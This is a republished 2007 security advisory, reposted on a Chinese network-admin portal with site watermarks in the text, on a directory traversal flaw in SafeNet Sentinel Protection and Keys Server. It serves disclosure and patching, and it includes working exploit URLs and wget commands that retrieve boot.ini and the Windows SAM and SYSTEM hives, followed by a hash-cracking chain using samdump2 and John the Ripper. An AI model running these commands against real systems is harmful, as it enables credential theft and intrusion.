| 网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 |
|
| Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道 |
Impact: Disclosure of system information, Disclosure of user information
Fix Available: Yes Exploit Included: Yes Vendor Confirmed: Yes
Version(s): Protection Server 7.0.0 through 7.4.0l; Keys Server 1.0.3; possibly prior versions
Description: A vulnerability was reported in SafeNet's Sentinel Protection Server and Sentinel Keys Server products. A remote user can view files on the target system. 网管网www.bitscn.com
The software does not properly validate user-supplied input. A remote user can supply a specially crafted request to view arbitrary files on target system.
网管bitscn_com
Demonstration exploit URLs for the Protection Server and Keys Server, respectively, are provided: 中国网管联盟bitsCN.com
http://[target]:6002/../../../../../../boo t.ini
http://[target]:7002/../../../../../../boot.ini
Elliot Kendall of Brandeis University and Corey Lebleu of Digital Defense independently reported this vulnerability.
Impact: A remote user can view files on the target system.
Solution: The vendor has issued fixed versions (Protection Server 7.4.1, Keys Server 1.0.4).
Vendor URL: www.safenet-inc.com/ (Links to External Site)
Cause: Input validation error
Underlying OS: Windows (Any)
Reported By: Elliot Kendall <ekendall@brandeis.edu>
Message History: None.
网管u家u.bitscn@com
Source Message Contents
Date: Mon, 26 Nov 2007 16:06:11 -0500
From: Elliot Kendall <ekendall@brandeis.edu>
Subject: Directory Traversal in SafeNet Sentinel Protection Server and Keys Server
网管bitscn_com
--tctmm6wHVGT/P6vA
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable 中国网管联盟bitsCN.com
SUMMARY
=3D=3D=3D=3D=3D=3D=3D
网管网www.bitscn.com
SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server
products include web servers which are vulnerable to directory
traversal attacks. A remote attacker could exploit these
vulnerabilities to read arbitrary files with the permissions of the web
server, typically SYSTEM. 网管u家u.bitsCN.com
AFFECTED SOFTWARE
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below
* Sentinel Keys Server 1.0.3 and possibly below 网管有家bitscn.net
UNAFFECTED
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
* Sentinel Protection Server 7.4.1
* Sentinel Keys Server 1.0.4 网管u家bitscn.net
IMPACT
=3D=3D=3D=3D=3D=3D 网管u家u.bitscn@com
A remote attacker could exploit this vulnerability to read sensitive
files on the affected system. Attractive targets include the SAM
registry hive which contains system password hashes. 网管u家u.bitscn@com
DETAILS
=3D=3D=3D=3D=3D=3D=3D 网管朋友网www_bitscn_net
Sentinel Protection Server and Sentinel Keys Server run web servers on
ports 6002 and 7002, respectively, to allow remote monitoring of key
use. The web server software does not santize request paths correctly
before using them in system calls. As a result, an attacker can request
files outside the web server's directory root by using the ../ notation
to refer to the parent directory of the current directory.
网管网www.bitscn.com
SOLUTION
=3D=3D=3D=3D=3D=3D=3D=3D
Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server
1.0.4.
First upgrade the Sentinel Driver software to 7.4.0 if you are using an
earlier version. 中国网管论坛bbs.bitsCN.com
http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip 网管联盟bitsCN_com
Then install "Security Patch to Sentinel Protection Installer 7.4.0"
网管u家u.bitsCN.com
http://safenet-inc.com/support/files/SPI740SecurityPatch.zip 网管网www_bitscn_com
EXPLOIT
=3D=3D=3D=3D=3D=3D=3D
Most popular web browsers are not be able to display URLs exploiting
this problem. I recommend using wget or lynx instead.
网管朋友网www_bitscn_net
Substitute port 7002 to target Keys Server instead of Protection
Server.
This example will retrieve the C:boot.ini file. 网管联盟bitsCN_com
http://XX.XX.XX.XX:6002/../../../../../../boot.ini 网管网www_bitscn_com
This example will retrieve a copy of the target system's SAM registry
hive from the Windows repair folder:
网管u家u.bitsCN.com
http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
网管u家bitscn.net
With the SAM and SYSTEM registry hives, it is possible to extract the
system's local password hashes for offline cracking. For example, using the
bkhive, samdump2, and John the Ripper tools: 网管联盟bitsCN_com
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=3Dall hashes 网管u家www.bitscn.net
http://ophcrack.sourceforge.net/bkhive.php
http://www.openwall.com/john/
网管下载dl.bitscn.com
ACKNOWLEDGMENTS
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D 网管bitscn_com
Thanks to SafeNet for patching this vulnerability and for working with
me on this advisory. 网管u家bitscn.net
According to Digital Defense, Inc.'s advisory, Corey Lebleu originally
discovered this problem on October 10th, 2007. I discovered the same
vulnerability independently on October 29th, 2007. I have no reason to
doubt Digital Defense, Inc.'s claim, and do not claim to have
discovered the problem first. 网管有家bitscn.net
REVISION HISTORY
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D 网管朋友网www_bitscn_net
2007-11-26 original release
网管u家bitscn.net
--=20
Elliot Kendall <ekendall@brandeis.edu>
Network Security Architect
Brandeis University
Trouble replying? See http://people.brandeis.edu/~ekendall/sign/
--tctmm6wHVGT/P6vA
Content-Type: application/x-pkcs7-signature
Content-Disposition: attachment; filename="smime.p7s"
Content-Transfer-Encoding: base64 网管下载dl.bitscn.com
MIIItAYJKoZIhvcNAQcCoIIIpTCCCKECAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC 网管u家www.bitscn.net
BiswggLkMIICTaADAgECAhAiAHapQpDn6ywD+hirb40QMA0GCSqGSIb3DQEBBQUAMGIxCzAJ
BgNVBAYTAlpBMSUwIwYDVQQKExxUaGF3dGUgQ29uc3VsdGluZyAoUHR5KSBMdGQuMSwwKgYD
VQQDEyNUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwgSXNzdWluZyBDQTAeFw0wNzExMjYxNDQ2
NTNaFw0wODExMjUxNDQ2NTNaMEcxHzAdBgNVBAMTFlRoYXd0ZSBGcmVlbWFpbCBNZW1iZXIx
JDAiBgkqhkiG9w0BCQEWFWVrZW5kYWxsQGJyYW5kZWlzLmVkdTCCASIwDQYJKoZIhvcNAQEB
BQADggEPADCCAQoCggEBAOLbQr8WGPq3p8lBtHYFqtHBmIPEauPgBVBsCXT7yUtXo8fMnB1b
dm542xhR11q+E2lw1kY9bZIC9OO8Qa3bWDWG9O0qIH0tJOGxhLQend4IaXHxNgxTHgvx2P+o
xRMuh/1fnK0i4mnGsNBITx4QQPBPn2aSLa0VB6bJ9WjleI2/0s1J2Eq//xDa/64KaSVrKjtF
osqMaazlg8GnWscAhBVD9GzQJT15325u3YGuNXXjWq5m3rbAu9ZADKTBNIwQohu5dK7gTots
TkhaNsbpVl34ZMnujCTgDC6sXWivnQd7h6Vo3A8TjiBwCj4T+p4wnCdB283Epf7gT3o8s6Bq
E+cCAwEAAaMyMDAwIAYDVR0RBBkwF4EVZWtlbmRhbGxAYnJhbmRlaXMuZWR1MAwGA1UdEwEB
/wQCMAAwDQYJKoZIhvcNAQEFBQADgYEAc2W8gGWJCSectclP30xoBQ3PBsLL4Tkh7wo1Fxyq 网管有家www.bitscn.net
v/FNlVLED/rN8xrH5lrGKqNHcp/zVzBFkJ0AR61dsgalf51aEwtgT6UhWIbI747wEAlyMwsM
prDiqzgXexhiUK7YeQJMcQ70NMCwbsJdBZBihNaqA4aUrUyO38lXbQ5EM1MwggM/MIICqKAD
AgECAgENMA0GCSqGSIb3DQEBBQUAMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVy
biBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5n
MSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtU
aGF3dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZy
ZWVtYWlsQHRoYXd0ZS5jb20wHhcNMDMwNzE3MDAwMDAwWhcNMTMwNzE2MjM1OTU5WjBiMQsw
CQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoG
A1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0EwgZ8wDQYJKoZIhvcN
AQEBBQADgY0AMIGJAoGBAMSmPFVzVftOucqZWh5owHUEcJ3f6f+jHuy9zfVb8hp2vX8MOmHy
v1HOAdTlUAow1wJjWiyJFXCO3cnwK4Vaqj9xVsuvPAsH5/EfkTYkKhPPK9Xzgnc9A74r/rsY
Pge/QIACZNenprufZdHFKlSFD0gEf6e20TxhBEAeZBlyYLf7AgMBAAGjgZQwgZEwEgYDVR0T
AQH/BAgwBgEB/wIBADBDBgNVHR8EPDA6MDigNqA0hjJodHRwOi8vY3JsLnRoYXd0ZS5jb20v 网管u家www.bitscn.net
VGhhd3RlUGVyc29uYWxGcmVlbWFpbENBLmNybDALBgNVHQ8EBAMCAQYwKQYDVR0RBCIwIKQe
MBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDItMTM4MA0GCSqGSIb3DQEBBQUAA4GBAEiM0VCD
6gsuzA2jZqxnD3+vrL7CF6FDlpSdf0whuPg2H6otnzYvwPQcUCCTcDz9reFhYsPZOhl+hLGZ
GwDFGguCdJ4lUJRix9sncVcljd2pnDmOjCBPZV+V2vf3h9bGCE6u9uo05RAaWzVNd+NWIXiC
3CEZNd4ksdMdRv9dX2VPMYICUTCCAk0CAQEwdjBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMc
VGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFs
IEZyZWVtYWlsIElzc3VpbmcgQ0ECECIAdqlCkOfrLAP6GKtvjRAwCQYFKw4DAhoFAKCBsTAY
BgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wNzExMjYyMTA2MTFa
MCMGCSqGSIb3DQEJBDEWBBSgSGOlB3YTtJPKEuSWUfMazfsMGDBSBgkqhkiG9w0BCQ8xRTBD
MAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzAN
BggqhkiG9w0DAgIBKDANBgkqhkiG9w0BAQEFAASCAQDex0YRJHYkWzOcctvah1Ksrpc/Ai2E
SZVvHPMaIuFpgmu2NDU16ilYodSBgzQ4ac9a8ihyTe4NERu7XLyqREklGqdPCX3mw8leGnug
lEyY9CQda+zxdG55mQU4JTr78atexueMf2AVeGDqR1KLd8TLfEYALeWlC0WnZOdx+P0kAyjV
oFQrL8pQ/1AP6GGpzaHa5yIwDn16ewtMACunxaQOWKsEA7xP4ODHSGcXtPIvQkMbsPDaub0L
oDaPCnv9OfCNZoiIKDHiNgQqu1U/E0fqSrp6S5L8wfz8IvUB/cqFyo3pN9yRh49cppqFtfqt
71LYdmcd3lWOZtJ0oeVmyQ+Z
--tctmm6wHVGT/P6vA-- 网管u家www.bitscn.net
网管联盟bitsCN_com
|
0
|
评论加载中…